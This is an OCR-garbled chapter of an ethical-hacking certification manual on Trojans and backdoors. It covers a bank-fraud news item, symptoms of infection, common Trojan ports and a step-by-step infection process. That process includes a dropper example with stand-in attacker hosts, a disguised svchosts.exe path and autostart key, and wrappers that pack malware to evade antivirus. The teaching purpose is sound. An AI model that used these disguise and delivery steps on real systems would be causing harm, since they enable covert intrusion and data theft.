Trojans and Backdoors

Module 06

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

Trojans and Backdoors
Module 06

Engineered by Hackers. Presented by Professionals.

CEH

Ethical H acking and C ounterm easures v8
Module 06: Trojans and Backdoors Exam 312-50

Module 06 Page 828

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

Security News
1 1111 1 11U i 1■ PCMAG.COM
C yb e r-C rim in a ls Plan M assive Tro ja n A tta c k on 30 Banks
Oct 05, 2012 1:24 PM EST

Troian Typ e s Indication of Troian Trojan Detection Troian Horse Construction Kit

A large-scale coordinated Trojan attack to launch fraudulent wire transfers may be headed your way. And it has nothing to do with the recent wave of denial-of-service attacks. A group of cybercriminals appear to be actively recruiting up to 100 botmasters to participate in a complicated man-in-the-middle hijacking scam using a variant of the Gozi Trojan, RSA's FraudAction research team said in a blog post yesterday. The team put together the warning after weeks of monitoring underground chatter. As many as 30 financial institutions in the United States may be targeted in this "blitzkrieg-like" series, said Mor Ahuvia, a cyber-crime communications specialist at RSA FraudAction. It's possible these well-known and high-profile institutions were selected, not because of "anti-American motives," but simply because American banks are less likely to have deployed two-factor authentication for private banking consumers, Ahuvia said. European banks generally require all consumers to use two-factor for wire transfers, making it harder to launch a man-in-the-middle session hijacking attack.
http://securitywatch.pcmag.com

Copyright © by EG-Gouncil. All Rights Jteservfed.;Reproduction is Strictly Prohibited.

^ am ps

S ecurity N ew s ‫״־‬

‫יי‬- fjfggC yber-C rim inals P lan M assive T rojan Attack on 30 Banks
Source: http://securitvwatch.pcmag.com A large-scale coordinated Trojan attack to launch fraudulent wire transfers may be headed your way. And it has nothing to do with the recent wave of denial-of-service attacks. A group of cybercriminals appears to be actively recruiting up to 100 botmasters to participate in a complicated man-in-the-middle hijacking scam using a variant of the Gozi Trojan, RSA's FraudAction research team said in a blog post recently. The team put together the warning after weeks of monitoring underground chatter. As many as 30 financial institutions in the United States may be targeted in this "blitzkrieg-like" series, said Mor Ahuvia, a cyber-crime communications specialist at RSA FraudAction. It's possible these well-known and high-profile institutions were selected, not because of "antiAmerican motives," but simply because American banks are less likely to have deployed twofactor authentication for private banking consumers, Ahuvia said. European banks generally require all consumers to use two-factor for wire transfers, making it harder to launch a man-inthe-middle session hijacking attack.

Module 06 Page 829

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

"A cyber gang has recently communicated its plans to launch a Trojan attack spree on 30 American banks as part of a large-scale orchestrated crimeware campaign," Ahuvia said. Potential targets and relevant law enforcement agencies have already been notified, RSA said. RSA FraudAction was not sure how far along the recruitment campaign has gone, or when the attacks are expected. W hile it's possible revealing the gang's plans may cause the criminals to scuttle their operation, it may just cause the group to modify the attack. "There are so many Trojans available and so many points of failure in security that could go wrong, that they'd still have some chance of success," Ahuvia said.

Anatomy of the Attack
The proposed cyber-attack consists of several parts. The first part involves infecting victim computers with the variant of the Gozi Trojan, which RSA has dubbed Gozi Prinimalka, Once the computer has been compromised, it will communicate with the botmaster's computer, which has a "virtual machine syncing module," capable of duplicating the victim's PC settings, such as the time zone, screen resolution, cookies, browser type, and installed software IDs, into a virtual machine, RSA said. W hen the attacker accesses victim accounts using the cloned system, the virtual machine appears to be a legitimate system using the last-known IP address for the victim's computer, RSA said. This cloning module would make it easy for the attackers to log in and initiate wire transfers. The attackers also plan to use VoIP phone flooding software to prevent victims from receiving confirmation calls or texts verifying online account transfers and activity, RSA said. The recruits have to make an initial investment in hardware and agree to training on how to deploy the Gozi Trojan, Ahuvia wrote. They will receive executable files, but not the compilers used to create the Trojan. In return, the new partners in this venture will receive a cut of the profits.

Trojan Behind Previous Attacks
The Trojan is not as well-known as others, such as SpyEye or Citadel, nor is it as widely available, Ahuvia said. Its relative obscurity means antivirus and security tools are less likely to flag it as malicious. RSA has linked the Gozi Trojan to previous attacks responsible for more than $5 million in losses in the United States in 2008. The researchers have linked the Trojan to a group called the HangUp Team, and speculated the same group was behind this latest campaign. The way the attack is structured, it is very likely the targeted institutions won't even realize they'd been affected till at least a month or two after the attacks. "The gang will set a prescheduled D-day to launch its spree, and attempt to cash out as many compromised accounts as possible before its operations are ground to a halt by security systems," Ahuvia said.

Module 06 Page 830

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

C o p yrig h t 1996-2012 Z iff Davis, Inc.

By Author: Fahmida Y . Rashid
http://securitvwatch.pcmag.com/none/B03577-cvber-criminals-plan-rr1assive-troian-attack-on30-banks

Module 06 Page 831

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

Module Objectives
J J J J J J What Is a Trojan? What Do Trojan Creators Look For Indications of a Trojan Attack Common Ports used by Trojans How to Infect Systems Using a Trojan Different Ways a Trojan can Get into a System Howto Deploy a Trojan ^ J J J J J J J Types of Trojans Trojan Analysis How to Detect Trojans Trojan Countermeasures Trojan Horse Construction Kit Anti-Trojan Software Pen Testing for Trojans and Backdoors

C EH

J

1 J------- 1
tz<

I
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

M odule O b jectiv e s
The main objective of this module is to provide you with knowledge about various kinds of Trojans and backdoors, the way they propagate or spread on the Internet, symptoms of these attacks, consequences of Trojan attacks, and various ways to protect network or system resources from Trojans and backdoor. This module also describes the penetration testing process to enhance your security against Trojans and backdoors. This module makes you familiarize with: e © © e 0 0 W hat Is a Trojan? W hat Do Trojan Creators Look For? Indications of a Trojan Attack Common Ports Used by Trojans How to Infect Systems Using a Trojan Different Ways a Trojan Can Get into a System 0 How to Deploy a Trojan © Types of Trojans 0 © Trojan Analysis How to Detect Trojans

ly

© Trojan Countermeasures 0 0 0 Trojan Horse Construction Kit Anti-Trojan Software Pen Testing for Trojans and Backdoors

Module 06 Page 832

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

Module Flow

CEH

Penetration Testing

Trojan Concepts

Anti-Trojan Software

Trojan Infection

Countermeasures Hg y

Types of Trojans

Trojan Detection

Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

M odule Flow
To understand various Trojans and backdoors and their impact on network and system resources, let's begin with basic concepts of Trojans. This section describes Trojans and highlights the purpose of Trojans, the symptoms of Trojan attacks, and the common ports used by Trojans.

Trojan Concepts

Countermeasures

,‫• נ‬ ■ 4 ^—
v‫— ׳‬

Trojans Infection

f | j| | ‫ ־‬Anti-Trojan Software

Types of Trojans

^

1 Penetration Testing

1 ‫׳׳‬

Trojan Detection

Module 06 Page 833

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

CEH
J It is a program in which the malicious or harmful code is contained inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on your hard disk Trojans replicate, spread, and get activated upon users' certain predefined actions J With the help of a Trojan, an attacker gets access to the stored passwords in the Trojaned computer and would be able to read personal documents, delete files and display pictures, and/or show messages on the screen

J

. .

Send me credit card details

Victim in Chicago infected with Trojan

Here is my credit card number and expire date

Send me Facebook account information

Victim in London infected with Trojan
Here is my Facebook login and profile

Send me e-banking login info

Victim in Paris infected with Trojan
Here is my bank ATM and pincode

Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.

W hat Is a T rojan?
According to Greek mythology, the Greeks won the Trojan W a r by entering in to the fortified city of Troy hiding in a huge, hollow wooden horse. The Greeks built a huge wooden horse for their soldiers to hide in. They left the horse in front of the gates of Troy. The Trojans thought it to be a gift from the Greeks, who had withdrawn from the war, and so they transported the horse into their city. At night, the Spartan soldiers broke through the wooden horse, and opened the gates for their soldiers who eventually destroyed the city of Troy. Taking a cue from Greek mythology, a computer Trojan is defined as a "malicious, securitybreaking program that is disguised as something benign." A computer Trojan horse is used to enter a victim's computer undetected, granting the attacker unrestricted access to the data stored on that computer and causing immense damage to the victim. For example, a user downloads what appears to be a movie or a music file, but when he or she runs it, it unleashes a dangerous program that may erase the unsuspecting user's disk and send his or her credit card numbers and passwords to a stranger. A Trojan can also be wrapped into a legitimate program, meaning that this program may have hidden functionality that the user is unaware of. In another scenario, a victim may also be used as an intermediary to attack others—without his or her knowledge. Attackers can use the victim's computer to commit illegal denial-of-service attacks such as those that virtually crippled the DALnet IRC network for months on end.

Module 06 Page 834

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

(DALnet is an Internet relay chat (IRC) network that is a form of instant communication over the network.) Trojan horses work on the same level of privileges that the victim user has. If the victim had the privileges, Trojan can delete files, transmit information, modify existing files, and install other programs (such as programs that provide unauthorized network access and execute privilegeelevation attacks). The Trojan horse can attempt to exploit a vulnerability to increase the level of access beyond that of the user running the Trojan horse. If successful, the Trojan horse can operate with increased privileges and may install other malicious codes on the victim's machine. A compromise of any system on a network may affect the other systems on the network. Systems that transmit authentication credentials such as passwords over shared networks in clear text or in a trivially encrypted form are particularly vulnerable. If a system on such a network is compromised, the intruder may be able to record user names and passwords or other sensitive information. Additionally, a Trojan, depending on the actions it performs, may falsely implicate the remote system as the source of an attack by spoofing and, thereby, cause the remote system to incur liabilities.
Send me credit card details

Here is my credit card number and expire date

;y ::!D y

Victim in Chicago infected with Trojan

Send me Facebook account Information Victim in London infected with Trojan Here is my Facebook login and profile

Send me e-banking login info I Here is my bank ATM and pincode I »‫ י‬J

t j

Victim in Paris infected with Trojan

FIGURE 6.1: Attacker extracting sensitive information from the system's infected with Trojan

Module 06 Page 835

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

Communication Paths: Overt and Covert Channels
Overt Channel
J A leg itim a te co m m u n icatio n p ath w ith in a co m p u ter system, o r n etw ork, for transfer of data J Exam ple of o vert channel includes gam es or any le g itim a te program s J J

EH

Covert Channel
An u n au th o rize d ch an n e l used fo r transferring sensitive data w ith in a com p uter system, or n etw o rk The sim plest form of covert channel is a Trojan

Poker.exe (Legitimate Application)

*
^

Trojan.exe (Keylogger Steals Passwords)

Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

n^

C o m m u n ic a tio n P ath s: O vert a n d C overt C h a n n e ls
Overt means something that is explicit, obvious, or evident, whereas covert means

something that is secret, concealed, or hidden. An overt channel is a legal, secure channel for the transfer of data or information within the network of a company. This channel is within the secure environment of the company and works securely for the transfer of data and information. On the other hand, a covert channel is an illegal, hidden path used to transfer data from a network. Covert channels are methods by which an attacker can hide data in a protocol that is undetectable. They rely on a technique called tunneling, which allows one protocol to be carried over another protocol. Covert channels are generally not used for information exchanges, so they cannot be detected by using standard system security methods. Any process or bit of data can be a covert channel. This makes it an attractive mode of transmission for a Trojan, since an attacker can use the covert channel to install the backdoor on the target machine.

Module 06 Page 836

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

Overt Channel A legitimate communication path within a computer system, or network, for the transfer of data An overt channel can be exploited to create the presence of a covert channel by selecting components of the overt channels with care that are idle or not related

Covert Channel A channel that transfers information within a computer system, or network, in a way that violates the security policy The simplest form of covert channel is a Trojan

TA BLE 6.1: Com parison b etw ee n O ve rt Channel and C overt Channel

Module 06 Page 837

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

Purpose of Trojans
Delete or replace operating system's critical files Disable firew alls and antivirus

C EH

G enerate fake traffic to create DOS attacks

Create backdoors to gain remote access

Download sp yw are, a d w are, and malicious files

Infect victim's PC as a proxy server for relaying attacks

Record screenshots, audio, and vid eo of victim's PC

Use victim 's PC as a b o tn et to perform DD 0 S attacks

Steal information such as passwords, security codes, credit card information using keyloggers

Use victim 's PC for spam m ing and blasting em ail messages

Copyright © by EG-Gtancil. All Rights Reserved. Reproduction is Strictly Prohibited

a.’*
I I

P u rp o se of T ro jan s
Trojan horses are the dangerous malicious programs that affect computer systems

without the victim's knowledge. The purpose of Trojan is to: 0 0 0 0 0 Delete or replace the operating system's critical files Generate fake traffic to create DOS attacks Download spyware, adware, and malicious files Record screenshots, and audio and video of the victim's PC Steal information such as passwords, security codes, and credit card information using keyloggers 0 0 0 0 0 Disable firewalls and antivirus software Create backdoors to gain remote access Infect a victim's PC as a proxy server for relaying attacks Use a victim's PC as a botnet to perform DDoS attacks Use a victim's PC for spamming and blasting email messages

Module 06 Page 838

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

W hat Do Troj an C reators Look For
Credit card information Financial data (bank account numbers, social security numbers, insurance information , etc.)

CEH

Using the victim's computer for illegal purposes, such as to hack, scan, flood, or infiltrate other machines on the network or Internet

VISA
Hacker
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

^ W hat Do T ro jan C re ato rs Look For?
Trojans are written to steal information from other systems and to exercise control over them. Trojans look for the target's personal information and, if found, return it to the Trojan writer (attacker). They can also allow attackers to take full control over a system. Trojans are not solely used for destructive purposes; they can also be used for spying on someone's machine and accessing private and/or sensitive information. Trojans are created for the following reasons: 9 To steal sensitive information, such as: © Credit card information, which can be used for domain registration, as well as for shopping. Account data such as email passwords, dial-up passwords, and web services passwords. Email addresses also help attackers to spam. 9 Important company projects including presentations and work-related papers could be the targets of these attackers, who may be working for rival companies.

9

Module 06 Page 839

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

9

Attackers can use the target's computers for storing archives of illegal materials, such as child pornography. The target can continue to use their computer, and have no idea about the illegal activities for which their computer is being used.

© Attackers can use the target computer as an FTP Server for pirated software. 0 Script kiddies may just want to have fun with the target's system. They might plant a Trojan in the system, which then starts acting strangely: the CD tray opens and closes frequently, the mouse functions improperly, etc. Q The compromised system might be used for other illegal purposes, and the target would be held responsible for all illegal activities, if the authorities discover them.

<
Hacker
F IG U R E 6.2: H acker stealing credit card inform ation from victim

Module 06 Page 840

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

Indications of a Trojan Attack
CD-ROM drawer opens and closes by itself

CEH

Abnormal activity by the modem, network adapter, or hard drive

Computer browser is redirected to unknown pages

‫ש‬

The account passwords are changed or unauthorized access

Strange chat boxes appear on victim's computer

Strange purchase statements appear in the credit card bills

Documents or messages are printed from the printer themselves

The ISP complains to the victim that his/her computer is IP scanning

Functions of the right and left mouse buttons are reversed

*

People know too much personal information about a victim

Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited

^

‫ ך־‬In d ic a tio n s of a T ro jan A ttack
A Trojan is software designed to steal data and demolish your system. It creates a

backdoor to attackers to intrude into your system in stealth mode. The system becomes vulnerable to the Trojan and attackers can easily launch their attack on the system if it is not safeguarded. Trojans can enter your system using various means such as email attachments, downloads, instant messages, open ports, etc. The following are some of the indications that you may notice on your system when it is attacked by the Trojan: 0 0 0 0 0 0 0 0 0 0 CD-ROM drawer opens and closes by itself Computer browser is redirected to unknown pages Strange chat boxes appear on target's computer Documents or messages are printed from the printer Functions of the right and left mouse buttons are reversed Abnormal activity by the modem, network adapter, or hard drive The account passwords are changed or unauthorized access Strange purchase statements appear in the credit card bills The ISP complains to the target that his or her computer is IP scanning People know too much personal information about a target

Module 06 Page 841

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

I n d ic a tio n s o f a T rojan A tta ck
(Cont’d)

q
(•Itlfwtf

g ‫ןן‬
Itklttl IU(kM

|

Antivirus is disabled or does not work properly

The taskbar disappears

Windows color settings change

Computer screen flips upside down or inverts

Screensaver's settings change automatically

Wallpaper or background settings change

The computer shuts down and powers off by itself

Ctrl+Alt+Del stops working

Copyright © by EC-CMICil. All Rights Reserved. Reproduction is Strictly Prohibited.

In d ic a tio n s of a T ro jan A ttack (C ont’d)
Though Trojans run in stealth mode, they exhibit some characteristics, observing which; you can determine the existence of Trojans on your computer. The following are typical symptoms of a Trojan horse virus infection: 9 9 9 9 9 9 9 9 9 9 9 9 Antivirus software is disabled or does not work properly The taskbar disappears Windows color settings change Computer screen flips upside down or inverts Screensaver's settings change automatically Wallpaper or background settings change Windows Start button disappears Mouse pointer disappears or moves by itself The computer shuts down and powers off by itself

Ctrl+Alt+Del stops working
Repeated crashes or programs open/close unexpectedly The computer monitor turns itself off and on

Module 06 Page 842

Ethical Hacking and Countermeasures Copyright © by EC-C0l1nCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

C o m m o n P orts u s e d b y T rojans
Port
2 20 21 22 23 25 31 80 421 456 m m 1 666

CEH
UrtifM IthKJl IlMkM

Trojan
Death Senna Spy Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx, WinCrash Shaft Tiny Telnet Server Antigen, Email Password Sender, Terminator, WinPC, WinSpy, Hackers Paradise Executor TCP Wrappers trojan Hackers Paradise lni*Killer, Phase Zero, Stealth Spy Satanz Backdoor Silencer, WebEx Doly Trojan RAT

Port

Trojan
FTP99CMP Shivka-Burka

Port
5569 6670-71 6969

Trojan
Robo-Hack DeepThroat GateCrasher, Priority Remote Grab NetMonitor

Port KZSH
22222 23456

Trojan
GirlFriend 1.0, Beta-1.35 Prosiak Evil FTP, Ugly FTP Delta NetSphere 1.27a

1807

SpySender Shockrave BackDoor 1.00-1.03

2001

Trojan Cow Ripper Bugs

7789

ICKiller BackOfrice 2000 Portal of Doom

31337-38 Back Orifice, DeepBO

NetSpy DK BOWhack
33333 34324

2140 2155 3129

The Invasor Illusion Mailer, Nirvana Masters Paradise The Invasor WinCrash File Nail 1 ICQTrojan Bubbel Sockets de Troie Firehotcker Blade Runner

9989 10607 11000 11223 12223 12345*46 12361, 12362 16969 20001 20034

iNi-Killer Coma 1.0.9 Senna Spy Progenic trojan Hack'99 Keylogger GabanBus, NetBus Whack-a-mole Priority Millennium NetBus 2.0, BetaNetBus 2.01

Prosiak

BigGluck, TN The Spy 40421-26 Masters Paradise
40412 47262 50505 50766 53001 54321 61466 65000

4567 4590 5000 5001 5321 5400-02

Delta Sockets de Troie Fore Remote Windows Shutdown SchoolBus .69-1.11 Telecommando Devil

1170

Psyber Stream Server, Voice Ultors Trojan SubSeven 1.0-1.8

1245

VooDoo Doll

Copyright © by EG-GtOIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

Com m on Ports Used by Trojans
IP ports play an important role in connecting your computer to the Internet and surfing the web, downloading information and files, running software updates, and sending and receiving emails and messages so that you can connect to the world. Each computer has unique sending and receiving ports for each function. Users need to have a basic understanding of the state of an "active connection" and ports commonly used by Trojans to determine if the system has been compromised. There are different states, but the "listening" state is the important one in this context. This state is generated when a system listens for a port number when it is waiting to make a connection with another system. Trojans are in a listening state when a system is rebooted. Some Trojans use more than one port as one port may be used for "listening" and the other(s) for data transfer.

Module 06 Page 843

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

Port
2 20 21 22 23 25 31 SO 421 456 555 666 1001 1011 1095-98 1170 1234 1243 Death Senna Spy

Trojan

Port
1492 1600 1807 1981 1999 2001 2023 2115 2140 2155 3129 3150 4092 4567 4590 5000 5001 5321 5400-02

Trojan
FTP99CMP Shivka-Burka SpySender Shockrave BackDoor 1.00 1.03 Trojan Cow Ripper Bugs The Invasor Illusion Mailer, Nirvana Masters Paradise The Invasor WinCrash File Nail 1 ICQTrojan Bubbel sockets de Trole Firehotcker Blade Runner

Port
5569 6670-71 6969 7000 7300-08 7789 8787 9872-9875 9989 10607 11000 11223

Trojan
Robo Hack DeepThroat Gatecrasher, Priority Remote Grab NetMonitor ICKiller BackOfrice 2000 Portal of Doom iNi-Killer Coma 1.0.9 Senna Spy Progenic trojan

Port
21544 22222 23456 26274 30100-02 31337-38 31339 31666 33333 34324 40412 40421-26 47262 Prosiak

Trojan
GirlFriend 1.0, Beta 1.35

Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx, WinCrash Shaft Tiny Telnet Server Antigen, Email Password Sender, Terminator, WinPC, WinSpy, Hackers Paradise Executor TCP Wrappers trojan Hackers Paradise Ini-Killer, Phase Zero, Stealth Spy Satanz Backdoor Silencer, WebEx Do ly Trojan RAT Psyber Stream Server, Voice ultors Trojan SubSeven 1.0-1.8 V 00D00 Doll

Evil FTP, Ugly FTP Delta NetSphere 1.27a Back Orifice, DeepBO NetSpy DK BOWhack Prosiak BigGluck.TN The Spy Masters Paradise Delta Sockets de Troie Fore Remote Windows Shutdown SchoolBus .69-1.11 Telecommando Devil

12223 12345-46 12361, 12362 16969 20001 20034

Hack’‘)‘) Key Logger GabanBus, NetBus Whack-a-mole Priority Millennium NetBus 2.0, Beta NetBus 2.01

50505 50766 53001 54321 61466 65000

TABLE 6.2: Common ports used by Trojans

Module 06 Page 844

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

M o d u le F lo w

U rtifM

CEH
IthKJi Nm Im

So far we have discussed various Trojan concepts. Now we will discuss Trojan infections.

Trojan Concepts

Countermeasures

Trojan Infection

|||||r

Anti-Trojan Softwares Penetration Testing

y — v‫׳‬

Types of Trojans

^

)

*‫ ר‬Trojan Detection
In this section, we will discuss the different methods adopted by the attacker for installing Trojans on the victim's system and infecting their system with this malware.

Module 06 Page 845

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

How to Infect S ystem s U sing a Trojan

£

p ro ce ss J

Create a new Trojan packet using a Trojan Horse Construction Kit

U

S

f

Create a dropper, which is a part in a trojanized packet that installs the malicious code on the target system

a e

Example of a Dropper
Installation path: c\windows\system32\svchosts .exe AlitOStart: HKLM\So£tware\Mlc \run\lexplorer. exe

Malicious code

O

1... 0

‫׳‬

Client address: client.attacker.com Dropzone: dropzone.attacker.com

Attacker

Malicious Code

A genuine application
File name: chess.exe Wrapper data: Executable file

Wrapper

Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

mi■1 " HI

How to Infect System s Using a Trojan

An attacker can control the hardware as well as software on the system remotely by installing Trojans. When a Trojan is installed on the system, not only does the data become vulnerable to threats, chances are that the attacker can perform attacks on the third-party system. Attackers infect the system using Trojans in many ways: 0 Trojans are included in bundled shareware or downloadable software. When a user downloads those files, Trojans are installed onto the systems automatically. Users are tricked with the different pop-up ads. It is programmed by the attacker in such a way that it doesn't matter if is the user clicks YES or NO; a download starts and the Trojan is installed onto the system automatically. Attackers send Trojans through email attachments. When those attachments are opened, the Trojan is installed on the system. Users are sometimes tempted to click on different kinds of files such as greeting cards, porn videos, images, etc., where Trojans are silently installed one the system.

9

0

Module 06 Page 846

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

The step-by-step process for infecting machines using a Trojan is as follows: Step 1: Create a new Trojan packet using a Trojan Horse Construction Kit. Step 2: Create a dropper, which is a part in a Trojanized packet that installs the malicious code on the target system.
n

Example of a Dropper
Installation path:
Autostart:

s

c\windows\system32\svchosts.exe

HKIiM\Software\Mi.c...\run\ Ie3<plorer.e x e

Malicious code
Client address: dient.attacker.com Dropzone: dropzone.attacker.com
■>

Attacker

Malicious Code

A genuine application
File name: chess.exe Wrapper data: Executable file

W ra pper

FIGURE 6.3: Illustrating the process of infecting machines using Trojans (1 of 2)

Module 06 Page 847

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

How to Infect S ystem s U sing a Trojan (C o n t’d)
Create a wrapper using wrapper tools to install Trojan on the victim's computer

C EH

Propagate the Trojan

Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

gr|jr How to Infect System s Using a Trojan (Cont’d)
Step 3: Create a wrapper using tools to install the Trojan on the victim's computer. By using various tools like petite.exe, Graffiti.exe, EliteWrap, etc., a wrapper is created to install the Trojan on the victim's computer. Step 4: Propagate the Trojan. Computer virus propagation (spreading) can be done through various methods: 0 An automatic execution mechanism is one method where traditionally it was spread through floppy disks and is now spread through various external devices. Once the computer is booted, the virus automatically spreads over the computer. Even viruses can be propagated through emails, Internet chats, network sharing, P2P file sharing, network redirecting, or hijacking.

0

Step 5: Execute the Dropper. Dropper is used by attackers to disguise their malware. The user is confused and believes that all the files are genuine or known files. Once it gets loaded into the host computer, it helps other malware to get loaded and perform the task. Step 6: Execute the damage routine. Most computer viruses contain a Damage Routine that delivers payloads. A payload sometimes just displays some images or messages whereas other payloads can even delete files, reformat hard drives, or cause other damage.

Module 06 Page 848

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

Dropper

......
> W w * ■
y Dropper drops the Trojan

- 1 1 ......
Trojan Packet

‫־ ־‬0 )

....... Wrapper

11 ----Trojan code execution

chess.exe

Attacker

s

‫׳‬

Victim's System

FIGURE 6.4: Illustrating the process of infecting machines using Trojans (2 of 2)

Module 06 Page 849

Ethical Hacking and Countermeasures Copyright © by EC-COUIlCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

W rappers
A wrapper binds a Trojan executable with an innocent looking .EXE application such ^as games or office applications

CEH

Chess.exe Che
/ Pilpci

Trojan.exe
Filesize: 20K
Filpci7p• 7 0 k

Filesize: 90K

Chess.exe
Filesize: 110K

When the user runs the wrapped EXE, it first installs the Trojan in the background and then runs the wrapping application in the foreground

‫־‬N The two programs are wrapped together into a single file Attackers might send a birthday greeting that will install a Trojan as the user watches, for example, a birthday cake dancing across the screen

V .

J

Source: http://www.objs.com Wrappers are used to bind the Trojan executable with a genuine-looking .EXE application such as games or office applications. When the user runs the wrapped EXE, it first installs the Trojan in the background and then runs the wrapping application in the foreground. The attacker can compress any (DOS/WIN) binary with tools such as petite.exe. This tool decompresses an EXE file (once compressed) on runtime. This makes it possible for the Trojan to get in virtually undetected, since most antivirus software is not able to detect the signatures in the file. The attacker can place several executables inside one executable, as well. These wrappers may also support functions such as running one file in the background while another one is running on the desktop. Technically speaking, wrappers can be considered another type of software "glueware" used to bind other software components together. A wrapper encapsulates into a single data source to make it usable in a more convenient fashion than the original unwrapped source. Users can be tricked into installing Trojan horses by being enticed or frightened. For instance, a Trojan horse might arrive in an email described as a computer game. When the user receives the mail, the description of the game may entice him or her to install it. Although it may, in fact, be a game, it may also be taking other action that is not readily apparent to the user, such as
Module 06 Page 850 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

deleting files or mailing sensitive information to the attacker. In another instance, wan attacker sends a birthday greeting that will install a Trojan as the user watches, such as a birthday cake dancing across the screen.

8 t l
(W ? Chess.exe Tro ja n .e x e

Filesize: 90K

^

Filesize: 20K

Chess.exe cness.exe
^ Filesize: 110K

FIGURE 6.5: Wrappers

Module 06 Page 851

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Trojans and Backdoors

Exam 312-50 Certified Ethical Hacker

Wrapper Covert Programs
‫׳‬f c i‫־‬ V rf*C 6 «‫־‬ T A lLM 5 I C rtfte u

CEH

H te 5 c e

[n ja rrio

vi TrOjaa.Net Advanced File Joiner

version 1.0
M s .11'. All I rl1.3j‫־‬q C rn ll^ i C::t»

1
FJt5 « I H ffi

rte u jw !
| ® IC ^ D ocumtrt* aij

